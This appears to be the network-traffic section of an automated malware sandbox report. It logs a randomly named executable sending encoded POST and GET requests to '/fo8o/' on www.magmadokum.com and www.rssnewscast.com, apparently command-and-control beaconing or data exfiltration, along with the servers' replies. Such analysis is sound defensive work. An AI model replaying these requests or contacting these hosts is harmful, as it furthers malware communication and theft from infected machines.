                                                                                    Data Raw: 46 50 4a 70 73 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 61 71 44 44 56 42 76 45 6a 45 4b 2f 62 41 4e 6a 74 68 2f 54 63 78 38 41 64 4d 4c 55 54 6f 39 77 41 4a 69 4c 57 4c 50 65 67 7a 49 30 6d 73 47 2f 72 52 36 4f 71 51 55 63 6e 42 4a 35 43 52 50 30 6f 2b 74 47 65 44 71 31 61 30 49 44 56 61 52 44 6d 65 63 4a 47 69 32 32 38 68 67 49 56 41 6f 4b 42 4c 55 6d 53 56 71 77 4d 79 33 49 57 76 59 53 64 70 63 54 66 74 30 7a 75 78 49 6d 43 6c 43 4f 50 79 35 35 30 31 54 46 58 63 48 6b 44 6b 72 4c 38 55 6a 67 35 30 4b 35 45 36 30 35 44 6d 65 33 51 48 78 6b 4b 65 51 4f 75 35 76 4f 58 6c 37 79 54 7a 57 4a 78 6b 30 62 6d 52 59 7a 74 32 69 4e 73 77 7a 43 76 35 30 4d 4d 4a 7a 30 64 67 68 67
                                                                                    Data Ascii: FPJps=nJfHJZySQmokaqDDVBvEjEK/bANjth/Tcx8AdMLUTo9wAJiLWLPegzI0msG/rR6OqQUcnBJ5CRP0o+tGeDq1a0IDVaRDmecJGi228hgIVAoKBLUmSVqwMy3IWvYSdpcTft0zuxImClCOPy5501TFXcHkDkrL8Ujg50K5E605Dme3QHxkKeQOu5vOXl7yTzWJxk0bmRYzt2iNswzCv50MMJz0dghg


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7192.168.2.54998385.159.66.93803724C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 15:33:14.527900934 CET1817OUTPOST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.magmadokum.com
                                                                                    Origin: http://www.magmadokum.com
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 1242
                                                                                    Referer: http://www.magmadokum.com/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Data Raw: 46 50 4a 70 73 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 61 71 44 44 56 42 76 45 6a 45 4b 2f 62 41 4e 6a 74 68 2f 54 63 78 38 41 64 4d 4c 55 54 6f 31 77 42 37 71 4c 57 73 54 65 76 54 49 30 76 4d 47 2b 72 52 36 44 71 52 39 56 6e 42 46 70 43 58 4c 30 71 64 6c 47 66 78 4f 31 52 30 49 44 4a 71 52 43 37 4f 63 6d 47 69 6d 79 38 67 51 49 56 41 6f 4b 42 4e 77 6d 62 67 57 77 4f 79 33 4a 47 2f 59 6b 5a 70 64 32 66 74 38 6a 75 78 4e 54 43 52 2b 4f 4d 53 70 35 35 6a 2f 46 56 38 48 6d 45 6b 72 54 38 55 76 37 35 30 6e 56 45 36 42 55 44 68 79 33 54 69 55 4d 61 73 73 6d 71 37 43 70 61 30 37 78 54 57 4b 4d 33 48 64 70 76 79 6b 44 69 48 69 48 36 48 4c 46 69 4b 68 63 65 38 72 2b 54 30 59 77 4c 51 43 4e 33 73 52 45 68 32 64 6f 47 4d 63 6e 49 67 53 73 4a 32 4b 71 68 33 30 78 30 4b 4d 52 54 4f 4f 67 38 54 78 55 44 54 31 61 67 53 4a 65 41 49 33 38 77 37 74 69 2b 73 6b 58 6d 4d 4b 2f 55 2f 4a 4d 4f 73 39 61 51 49 70 78 55 77 32 4d 67 4d 47 39 78 67 77 68 57 74 75 72 44 7a 73 68 43 41 76 54 6d 64 50 70 2f 70 2b 44 33 6b 6f 64 [TRUNCATED]
                                                                                    Data Ascii: FPJps=nJfHJZySQmokaqDDVBvEjEK/bANjth/Tcx8AdMLUTo1wB7qLWsTevTI0vMG+rR6DqR9VnBFpCXL0qdlGfxO1R0IDJqRC7OcmGimy8gQIVAoKBNwmbgWwOy3JG/YkZpd2ft8juxNTCR+OMSp55j/FV8HmEkrT8Uv750nVE6BUDhy3TiUMassmq7Cpa07xTWKM3HdpvykDiHiH6HLFiKhce8r+T0YwLQCN3sREh2doGMcnIgSsJ2Kqh30x0KMRTOOg8TxUDT1agSJeAI38w7ti+skXmMK/U/JMOs9aQIpxUw2MgMG9xgwhWturDzshCAvTmdPp/p+D3kod2l+4YvNn23tJipx85/rQsbb3tgjLhyi4g5fehCShG7oCKTUnlOGH7C/MLlLCFBepNCelwLd4FLiBoORpWPOJduHh5uXpVuvEsxDtqlVHzP4C83V2BciD6jh4S6IfuEsb550muWnceqjpZzyLMUjqSspZqRKhzaqChBo0BSgiACGCO3NiS+toURxH1cbr4Asre4PUxzDj75BwPzFCgslxA5RscTk4WEk+bCRmOaNg30J49XkrSmC4X/iGbLstKZ/+TwHfwDWCbdQ6zApgNjvoTYeR8Hw1dGOQFcFPta/FQ2Stmx9P86MQwPjea3KS4PVUJS0mUBOaht/UPFEay20NWWi+fqfZG/d2d5TndsbuTUZ1XkAQwkco/3d1C4d3IIm85c+Isp2iJHtRPm0PCDOGoFuWr9zbjbI6mC2oo+9mtb82rZwgxWvBcEqSIoPgX68mpMXfB+GxS8wiAVIg6LcZ43JTeSUmEdWOS9n2l23pEkKGCckJdweFIbk2pBKrxDA4pPfGW5AuMvs+uRkDTNdlWS/4bXYqJV1TJ/SsX72SRqzRbaJd6Z0105PebcTu+euDbNQuFvyY1FEwvx+MGzmrDE747BBulIm5nTvGgehCJqH8jghMMedUadcLcHLEgKBZebl+VoSnbQN7j2txb1iNWNBZagGJ2RM8Fx [TRUNCATED]


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    8192.168.2.54998485.159.66.93803724C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 15:33:17.065604925 CET519OUTGET /fo8o/?vVyTz=x4ZDmHH0&FPJps=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjMWAnWKRmrKgMQiWi7WA8E0wwbeEcZziILA/VBeUyRYh4cA== HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.magmadokum.com
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Jan 7, 2025 15:34:17.781847954 CET194INHTTP/1.0 504 Gateway Time-out
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 0a 54 68 65 20 73 65 72 76 65 72 20 64 69 64 6e 27 74 20 72 65 73 70 6f 6e 64 20 69 6e 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <html><body><h1>504 Gateway Time-out</h1>The server didn't respond in time.</body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    9192.168.2.54998591.195.240.94803724C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 15:34:22.822089911 CET783OUTPOST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.rssnewscast.com
                                                                                    Origin: http://www.rssnewscast.com
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 206
                                                                                    Referer: http://www.rssnewscast.com/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Data Raw: 46 50 4a 70 73 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 57 2f 30 4f 35 68 55 50 58 53 72 57 2b 48 41 41 67 71 54 52 6e 45 64 72 65 38 43 58 47 36 77 51 38 50 36 48 62 41 42 6c 4f 4c 58 79 36 76 68 69 4b 58 52 70 69 39 36 54 66 55 62 67 30 62 74 76 71 77 54 4c 6d 76 78 47 2b 35 30 31 68 58 36 4f 4d 6c 71 59 38 42 31 44 57 54 59 4b 41 6c 2f 30 49 45 41 66 6f 68 73 4c 30 56 6c 4a 66 58 39 55 41 2b 4d 6b 55 6c 31 54 53 70 31 59 54 43 7a 54 5a 7a 77 6c 33 62 53 4a 6b 45 46 73 6b 36 4b 5a 6b 37 44 38 70 4d 38 45 65 4e 56 32 71 43 59 59 32 64 72 47 6d 77 6a 52 56 68 44 61 6e 55 34 4d 5a 48 58 68 58 54 42 65 30 50 30 3d
                                                                                    Data Ascii: FPJps=81L18xe3ynKwW/0O5hUPXSrW+HAAgqTRnEdre8CXG6wQ8P6HbABlOLXy6vhiKXRpi96TfUbg0btvqwTLmvxG+501hX6OMlqY8B1DWTYKAl/0IEAfohsL0VlJfX9UA+MkUl1TSp1YTCzTZzwl3bSJkEFsk6KZk7D8pM8EeNV2qCYY2drGmwjRVhDanU4MZHXhXTBe0P0=
                                                                                    Jan 7, 2025 15:34:23.472903967 CET707INHTTP/1.1 405 Not Allowed
                                                                                    date: Tue, 07 Jan 2025 14:34:23 GMT
                                                                                    content-type: text/html
                                                                                    content-length: 556
                                                                                    server: Parking/1.0
                                                                                    connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    10192.168.2.54998691.195.240.94803724C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 15:34:25.347731113 CET803OUTPOST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.rssnewscast.com
                                                                                    Origin: http://www.rssnewscast.com
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 226
                                                                                    Referer: http://www.rssnewscast.com/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Data Raw: 46 50 4a 70 73 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 58 65 45 4f 71 53 73 50 41 43 72 56 78 6e 41 41 72 4b 54 56 6e 45 52 72 65 35 69 48 47 4d 67 51 38 74 69 48 61 42 42 6c 4c 4c 58 79 79 50 68 6e 4a 6e 52 69 69 39 2f 7a 66 57 66 67 30 61 4e 76 71 77 6a 4c 6d 65 78 48 2b 70 30 7a 34 48 36 49 55 46 71 59 38 42 31 44 57 54 6c 6c 41 6c 58 30 4c 33 49 66 70 41 73 4b 33 56 6c 4b 63 58 39 55 45 2b 4d 67 55 6c 30 47 53 6f 6f 7a 54 48 33 54 5a 33 30 6c 32 4b 53 4b 74 45 45 6e 37 4b 4c 50 73 35 69 53 67 64 78 49 55 4d 4d 45 38 67 59 42 33 72 47 73 38 53 72 35 47 42 76 69 33 48 77 37 49 33 32 49 4e 77 52 75 71 59 69 72 31 39 44 73 35 46 2f 48 61 6e 6e 55 34 52 42 43 41 4a 64 66
                                                                                    Data Ascii: FPJps=81L18xe3ynKwXeEOqSsPACrVxnAArKTVnERre5iHGMgQ8tiHaBBlLLXyyPhnJnRii9/zfWfg0aNvqwjLmexH+p0z4H6IUFqY8B1DWTllAlX0L3IfpAsK3VlKcX9UE+MgUl0GSoozTH3TZ30l2KSKtEEn7KLPs5iSgdxIUMME8gYB3rGs8Sr5GBvi3Hw7I32INwRuqYir19Ds5F/HannU4RBCAJdf
                                                                                    Jan 7, 2025 15:34:25.983161926 CET707INHTTP/1.1 405 Not Allowed
                                                                                    date: Tue, 07 Jan 2025 14:34:25 GMT
                                                                                    content-type: text/html
                                                                                    content-length: 556
                                                                                    server: Parking/1.0
                                                                                    connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    11192.168.2.54998791.195.240.94803724C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 15:34:27.877615929 CET1820OUTPOST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.rssnewscast.com
                                                                                    Origin: http://www.rssnewscast.com
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 1242
                                                                                    Referer: http://www.rssnewscast.com/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Data Raw: 46 50 4a 70 73 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 58 65 45 4f 71 53 73 50 41 43 72 56 78 6e 41 41 72 4b 54 56 6e 45 52 72 65 35 69 48 47 4d 6f 51 38 34 2b 48 61 69 70 6c 4d 4c 58 79 74 2f 68 6d 4a 6e 52 46 69 39 48 2f 66 57 43 56 30 66 4a 76 73 52 44 4c 78 36 6c 48 31 70 30 7a 6c 58 36 4e 4d 6c 71 33 38 42 45 49 57 58 46 6c 41 6c 58 30 4c 32 34 66 73 68 73 4b 78 56 6c 4a 66 58 39 41 41 2b 4d 49 55 68 5a 39 53 6f 39 49 54 7a 44 54 61 58 6b 6c 31 34 71 4b 76 6b 45 6c 34 4b 4c 48 73 35 75 52 67 64 73 35 55 4d 34 75 38 69 59 42 31 64 62 75 6d 7a 4c 67 61 41 33 54 2f 58 6f 6d 65 44 6d 76 4b 79 68 45 33 61 76 52 31 66 53 45 79 67 58 6e 59 6b 47 6d 6c 67 4e 56 51 65 68 4f 31 36 35 63 4f 37 32 6c 69 68 4e 46 4c 78 6b 59 43 6a 56 6b 52 78 4d 79 6c 4c 70 48 69 2f 7a 71 65 4a 48 49 31 64 75 30 31 42 36 61 46 56 45 43 2b 47 4b 39 57 4a 55 36 67 59 4a 55 50 65 63 43 6a 7a 4b 39 73 77 44 57 61 79 62 38 5a 6d 48 5a 65 4a 2f 34 4f 53 53 44 72 58 4f 71 52 44 79 73 57 66 4e 33 69 72 64 62 46 68 52 78 48 61 73 64 [TRUNCATED]
                                                                                    Data Ascii: FPJps=81L18xe3ynKwXeEOqSsPACrVxnAArKTVnERre5iHGMoQ84+HaiplMLXyt/hmJnRFi9H/fWCV0fJvsRDLx6lH1p0zlX6NMlq38BEIWXFlAlX0L24fshsKxVlJfX9AA+MIUhZ9So9ITzDTaXkl14qKvkEl4KLHs5uRgds5UM4u8iYB1dbumzLgaA3T/XomeDmvKyhE3avR1fSEygXnYkGmlgNVQehO165cO72lihNFLxkYCjVkRxMylLpHi/zqeJHI1du01B6aFVEC+GK9WJU6gYJUPecCjzK9swDWayb8ZmHZeJ/4OSSDrXOqRDysWfN3irdbFhRxHasdGJ8fHmgRUQ7q75bPSfk5DUYG9UBoGdi8/mF/xbb5iSBE5JY12dA9aYXe5DGaUCD9a4C2fei4rNKdB9+BuOOEs4LKirthC28h2UyW7au3cW4PlACw9lABunaNscL+QtWzR0nRbjK8h1wMNNZK1kvO/iZcESC7N+cDrmgluCEHjfQXc0V2cvBN6bVduPb1dXYDe5/WGT/pCef4uOWdjBYB3f2EIBwROeAD75Mkn4n9Gbm9RO9xHMSnAUWNtBfPdhdkU+HNFMIly/4KFW2Y3PE1IR2k1a68+R8/BBBBOIwVSCGCeSfnbUZzQBeUWLBT22wRNNq+pkmWyRUDpFvf2jyfm3jS5K5KbFyo+Q/N6MUOpbO4V9IW5yGU9dOvkF68jtOUwQnVuE34QDrlXP9Q7Q8RIajk+fsL6l23HbWMc5Rs6ZOhHPv/oN0K9yBpnczxPQwb/nUR7UgEKZD1DjVw/Itpwyrh2mukh9gARKuIkh6Dw0GhJs5mUjJZ5ykBfSPKYkHSaDVs8H6iFEa0XmrFHU8AZOyE6oSxQ5c7MfQUmgtQ950qfdhIgaLeofjVX6RZdPen2hXitfVv/8m4jR37t0NuhY5JWHwSC2h6mRHsY/Wrxf1b0F8wpfgYsZD2q/QAl3ByJjp3n6dvdP3bj+k0a9v6QyqIR5IJSPY60M [TRUNCATED]
                                                                                    Jan 7, 2025 15:34:28.602495909 CET707INHTTP/1.1 405 Not Allowed
                                                                                    date: Tue, 07 Jan 2025 14:34:28 GMT
                                                                                    content-type: text/html
                                                                                    content-length: 556
                                                                                    server: Parking/1.0
                                                                                    connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    12192.168.2.54998891.195.240.94803724C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 15:34:30.412012100 CET520OUTGET /fo8o/?FPJps=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNo7YSnSe3b06z1hRjejs3ag7OBngOhxFR5lEHJntjOPFYJw==&vVyTz=x4ZDmHH0 HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.rssnewscast.com
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Jan 7, 2025 15:34:31.104907990 CET1236INHTTP/1.1 200 OK
                                                                                    date: Tue, 07 Jan 2025 14:34:31 GMT
                                                                                    content-type: text/html; charset=UTF-8
                                                                                    transfer-encoding: chunked
                                                                                    vary: Accept-Encoding
                                                                                    expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                    cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                    pragma: no-cache
                                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_lFvCFF1qxSaEiSC2Zshe5fpXOGFnnyTzACxwsZoHWW3uY42g9RxPvh3H6Cfl/Tn2oo/7/M4eq2DErri2E0h8Zw==
                                                                                    last-modified: Tue, 07 Jan 2025 14:34:30 GMT
                                                                                    x-cache-miss-from: parking-7df97dc48-wnnqn
                                                                                    server: Parking/1.0
                                                                                    connection: close
                                                                                    Data Raw: 32 45 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 6c 46 76 43 46 46 31 71 78 53 61 45 69 53 43 32 5a 73 68 65 35 66 70 58 4f 47 46 6e 6e 79 54 7a 41 43 78 77 73 5a 6f 48 57 57 33 75 59 34 32 67 39 52 78 50 76 68 33 48 36 43 66 6c 2f 54 6e 32 6f 6f 2f 37 2f 4d 34 65 71 32 44 45 72 72 69 32 45 30 68 38 5a 77 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 72 73 73 6e 65 77 73 63 61 73 74 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 72 73 73 6e [TRUNCATED]
                                                                                    Data Ascii: 2E3<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_lFvCFF1qxSaEiSC2Zshe5fpXOGFnnyTzACxwsZoHWW3uY42g9RxPvh3H6Cfl/Tn2oo/7/M4eq2DErri2E0h8Zw==><head><meta charset="utf-8"><title>rssnewscast.com&nbsp;-&nbsp;rssnewscast Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="rssnewscast.com is your first and best source for all of the informatio
